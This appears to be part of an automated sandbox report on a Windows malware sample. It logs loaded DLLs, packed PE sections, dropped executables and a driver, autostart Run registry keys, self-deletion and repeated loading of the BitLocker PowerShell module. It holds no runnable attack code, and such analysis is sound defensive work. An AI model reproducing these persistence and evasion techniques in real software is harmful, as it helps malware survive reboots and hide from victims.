                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeStatic file information: File size 1274368 > 1048576
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeStatic PE information: Raw size of t2 is bigger than: 0x100000 < 0x136000
                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbz source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: _prod.pdb source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: WINLOA~1.PDBw source: w32tm.exe, 0000000B.00000002.1594404005.000000000052C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Rprod.pdb source: w32tm.exe, 0000000B.00000002.1594404005.0000000000520000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_0040BCA0 WaitForSingleObject,GetLocalTime,SystemTimeToFileTime,wnsprintfW,RegDeleteKeyExW,wnsprintfW,RegDeleteKeyExW,wnsprintfW,RegDeleteKeyExW,wnsprintfW,RegDeleteKeyExW,GetFileAttributesW,SHFileOperationW,Sleep,LocalFree,__snwprintf,GetWindowsDirectoryW,__snwprintf,CreateProcessW,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,LoadLibraryW,GetProcAddress,GetProcAddress,CloseHandle,CloseHandle,TerminateProcess,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,0_2_0040BCA0
                    Source: initial sampleStatic PE information: section where entry point is pointing to: t2
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeStatic PE information: section name: t0
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeStatic PE information: section name: t1
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeStatic PE information: section name: t2
                    Source: w32tm.exe.4.drStatic PE information: section name: s00
                    Source: w32tm.exe.4.drStatic PE information: section name: s01
                    Source: w32tm.exe.4.drStatic PE information: section name: s02
                    Source: tzutil.exe.4.drStatic PE information: section name: ss0
                    Source: tzutil.exe.4.drStatic PE information: section name: ss1
                    Source: tzutil.exe.4.drStatic PE information: section name: ss2
                    Source: bS4Vs_8188.sys.8.drStatic PE information: section name: vs0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_0042C275 push ecx; ret 0_2_0042C288
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_0049B3CD push ecx; ret 0_2_0049B3E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_0040A6A2 push eax; ret 0_2_0040A6A3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_004E47D7 push esp; iretd 0_2_004E4805
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_004DAD32 push ss; retf 0_2_004DAD82
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008C2D40 push rcx; iretd 8_2_008C2D43
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00947E88 push rax; retn 0094h8_2_00947E89
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_00000001400136B7 push rsp; iretd 11_2_00000001400136B8
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 11_2_00000001400136D2 push rsp; iretd 11_2_00000001400136D3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF88B23D2A5 pushad ; iretd 12_2_00007FF88B23D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF88B35AA77 push esp; retf 12_2_00007FF88B35AA78
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF88B422316 push 8B485F93h; iretd 12_2_00007FF88B42231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF88B24D2A5 pushad ; iretd 14_2_00007FF88B24D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF88B36B9FA push E85B63D7h; ret 14_2_00007FF88B36BAF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF88B36BA7A push E85B63D7h; ret 14_2_00007FF88B36BAF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF88B3619DA pushad ; ret 14_2_00007FF88B3619E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF88B432316 push 8B485F92h; iretd 14_2_00007FF88B43231B
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeStatic PE information: section name: t2 entropy: 7.990998236108881
                    Source: w32tm.exe.4.drStatic PE information: section name: s02 entropy: 7.959351043402205
                    Source: tzutil.exe.4.drStatic PE information: section name: ss2 entropy: 7.983950147296706
                    Source: bS4Vs_8188.sys.8.drStatic PE information: section name: .text entropy: 7.126561604240753

                    Persistence and Installation Behavior

                    barindex
                    Sample is not signed and drops a device driver
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeFile created: C:\Windows\Temp\bS4Vs_8188.sysJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeJump to dropped file
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeFile created: C:\Windows\Temp\bS4Vs_8188.sysJump to dropped file
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeJump to dropped file
                    Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeJump to dropped file
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeFile created: C:\Windows\Temp\bS4Vs_8188.sysJump to dropped file

                    Boot Survival

                    barindex
                    Creates autostart registry keys with suspicious names
                    Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\N4nguGs_8188Jump to behavior
                    Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}Jump to behavior
                    Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}Jump to behavior
                    Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}Jump to behavior
                    Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}Jump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Deletes itself after installation
                    Source: C:\Windows\System32\svchost.exeFile deleted: c:\users\user\desktop\securiteinfo.com.win32.malwarex-gen.15639.2654.exeJump to behavior
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDB8830 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,4_2_000001C3DDDB8830
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\{42F09F7D-CA44-409E-A936-E948CF4ECA66} {875376CD-1334-41AA-8A36-0C7105D31883}Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
